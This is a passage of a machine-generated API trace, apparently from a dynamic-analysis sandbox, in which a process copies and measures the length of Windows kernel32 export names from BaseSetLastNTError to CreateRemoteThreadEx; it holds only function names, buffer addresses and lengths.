lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0178.649] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0178.649] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0178.649] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0178.649] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0178.649] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0178.649] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0178.649] lstrcpyA (in: lpString1=0x31ce648, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0178.649] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0178.649] lstrcpyA (in: lpString1=0x31ce648, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0178.649] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0178.649] lstrcpyA (in: lpString1=0x31ce648, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0178.650] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0178.650] lstrcpyA (in: lpString1=0x31ce648, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0178.650] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0178.650] lstrcpyA (in: lpString1=0x31ce648, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0178.650] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0178.650] lstrcpyA (in: lpString1=0x31ce648, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0178.650] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0178.650] lstrcpyA (in: lpString1=0x31ce648, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0178.650] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0178.650] lstrcpyA (in: lpString1=0x31ce648, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0178.650] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0178.650] lstrcpyA (in: lpString1=0x31ce648, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0178.650] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0178.650] lstrcpyA (in: lpString1=0x31ce648, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0178.650] lstrlenA (lpString="BEEP") returned 4 [0178.650] lstrcpyA (in: lpString1=0x31ce648, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0178.650] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0178.650] lstrcpyA (in: lpString1=0x31ce648, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0178.650] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0178.650] lstrcpyA (in: lpString1=0x31ce648, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0178.650] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0178.650] lstrcpyA (in: lpString1=0x31ce648, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0178.650] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0178.650] lstrcpyA (in: lpString1=0x31ce648, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0178.650] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0178.650] lstrcpyA (in: lpString1=0x31ce648, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0178.650] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0178.650] lstrcpyA (in: lpString1=0x31ce648, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0178.650] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0178.650] lstrcpyA (in: lpString1=0x31ce648, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0178.650] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0178.650] lstrcpyA (in: lpString1=0x31ce648, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0178.650] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0178.650] lstrcpyA (in: lpString1=0x31ce648, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0178.650] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0178.650] lstrcpyA (in: lpString1=0x31ce648, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0178.650] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0178.651] lstrcpyA (in: lpString1=0x31ce648, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0178.651] lstrlenA (lpString="CANCELIO") returned 8 [0178.651] lstrcpyA (in: lpString1=0x31ce648, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0178.651] lstrlenA (lpString="CANCELIOEX") returned 10 [0178.651] lstrcpyA (in: lpString1=0x31ce648, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0178.651] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0178.651] lstrcpyA (in: lpString1=0x31ce648, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0178.651] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0178.651] lstrcpyA (in: lpString1=0x31ce648, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0178.651] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0178.651] lstrcpyA (in: lpString1=0x31ce648, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0178.651] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0178.651] lstrcpyA (in: lpString1=0x31ce648, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0178.651] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0178.651] lstrcpyA (in: lpString1=0x31ce648, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0178.651] lstrlenA (lpString="CHECKELEVATION") returned 14 [0178.651] lstrcpyA (in: lpString1=0x31ce648, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0178.651] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0178.651] lstrcpyA (in: lpString1=0x31ce648, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0178.651] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0178.651] lstrcpyA (in: lpString1=0x31ce648, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0178.651] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0178.651] lstrcpyA (in: lpString1=0x31ce648, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0178.651] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0178.651] lstrcpyA (in: lpString1=0x31ce648, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0178.651] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0178.651] lstrcpyA (in: lpString1=0x31ce648, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0178.651] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0178.651] lstrcpyA (in: lpString1=0x31ce648, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0178.651] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0178.651] lstrcpyA (in: lpString1=0x31ce648, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0178.651] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0178.651] lstrcpyA (in: lpString1=0x31ce648, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0178.651] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0178.651] lstrcpyA (in: lpString1=0x31ce648, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0178.651] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0178.651] lstrcpyA (in: lpString1=0x31ce648, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0178.652] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0178.652] lstrcpyA (in: lpString1=0x31ce648, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0178.652] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0178.652] lstrcpyA (in: lpString1=0x31ce648, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0178.652] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0178.652] lstrcpyA (in: lpString1=0x31ce648, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0178.652] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0178.652] lstrcpyA (in: lpString1=0x31ce648, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0178.652] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0178.652] lstrcpyA (in: lpString1=0x31ce648, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0178.652] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0178.652] lstrcpyA (in: lpString1=0x31ce648, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0178.652] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0178.652] lstrcpyA (in: lpString1=0x31ce648, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0178.652] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0178.652] lstrcpyA (in: lpString1=0x31ce648, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0178.652] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0178.652] lstrcpyA (in: lpString1=0x31ce648, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0178.652] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0178.652] lstrcpyA (in: lpString1=0x31ce648, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0178.652] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0178.652] lstrcpyA (in: lpString1=0x31ce648, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0178.652] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0178.652] lstrcpyA (in: lpString1=0x31ce648, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0178.652] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0178.652] lstrcpyA (in: lpString1=0x31ce648, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0178.652] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0178.652] lstrcpyA (in: lpString1=0x31ce648, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0178.652] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0178.652] lstrcpyA (in: lpString1=0x31ce648, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0178.652] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0178.652] lstrcpyA (in: lpString1=0x31ce648, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0178.652] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0178.652] lstrcpyA (in: lpString1=0x31ce648, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0178.652] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0178.652] lstrcpyA (in: lpString1=0x31ce648, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0178.652] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0178.653] lstrcpyA (in: lpString1=0x31ce648, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0178.653] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0178.653] lstrcpyA (in: lpString1=0x31ce648, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0178.653] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0178.653] lstrcpyA (in: lpString1=0x31ce648, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0178.653] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0178.653] lstrcpyA (in: lpString1=0x31ce648, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0178.653] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0178.653] lstrcpyA (in: lpString1=0x31ce648, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0178.653] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0178.653] lstrcpyA (in: lpString1=0x31ce648, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0178.653] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0178.653] lstrcpyA (in: lpString1=0x31ce648, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0178.653] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0178.653] lstrcpyA (in: lpString1=0x31ce648, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0178.653] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0178.653] lstrcpyA (in: lpString1=0x31ce648, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0178.653] lstrlenA (lpString="COPYCONTEXT") returned 11 [0178.653] lstrcpyA (in: lpString1=0x31ce648, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0178.653] lstrlenA (lpString="COPYFILEA") returned 9 [0178.653] lstrcpyA (in: lpString1=0x31ce648, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0178.653] lstrlenA (lpString="COPYFILEEXA") returned 11 [0178.653] lstrcpyA (in: lpString1=0x31ce648, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0178.653] lstrlenA (lpString="COPYFILEEXW") returned 11 [0178.653] lstrcpyA (in: lpString1=0x31ce648, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0178.653] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0178.653] lstrcpyA (in: lpString1=0x31ce648, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0178.653] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0178.653] lstrcpyA (in: lpString1=0x31ce648, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0178.653] lstrlenA (lpString="COPYFILEW") returned 9 [0178.653] lstrcpyA (in: lpString1=0x31ce648, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0178.653] lstrlenA (lpString="COPYLZFILE") returned 10 [0178.653] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0178.653] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0178.653] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0178.653] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0178.653] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0178.653] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0178.654] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0178.654] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0178.654] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0178.654] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0178.654] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0178.654] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0178.654] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0178.654] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0178.654] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0178.654] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0178.654] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0178.654] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0178.654] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0178.654] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0178.654] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0178.654] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0178.654] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0178.654] lstrlenA (lpString="CREATEEVENTA") returned 12 [0178.654] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0178.654] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0178.654] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0178.654] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0178.654] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0178.654] lstrlenA (lpString="CREATEEVENTW") returned 12 [0178.654] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0178.654] lstrlenA (lpString="CREATEFIBER") returned 11 [0178.654] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0178.654] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0178.654] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0178.654] lstrlenA (lpString="CREATEFILEA") returned 11 [0178.654] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0178.654] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0178.654] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0178.654] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0178.654] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0178.654] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0178.654] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0178.655] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0178.655] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0178.655] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0178.655] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0178.655] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0178.655] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0178.655] lstrlenA (lpString="CREATEFILEW") returned 11 [0178.655] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0178.655] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0178.655] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0178.655] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0178.655] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0178.655] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0178.655] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0178.655] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0178.655] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0178.655] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0178.655] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0178.655] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0178.655] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0178.655] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0178.655] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0178.655] lstrlenA (lpString="CREATEJOBSET") returned 12 [0178.655] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0178.655] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0178.655] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0178.655] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0178.655] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0178.655] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0178.655] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0178.655] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0178.655] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0178.655] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0178.655] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0178.655] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0178.655] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0178.656] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0178.656] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0178.656] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0178.656] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0178.656] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0178.656] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0178.656] lstrlenA (lpString="CREATEPIPE") returned 10 [0178.656] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0178.656] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0178.656] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0178.656] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0178.656] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0178.656] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0178.656] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0178.656] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0178.656] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0178.656] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0178.656] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0178.656] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0178.656] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0178.656] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0178.656] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0178.656] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0178.656] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0178.656] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0178.656] 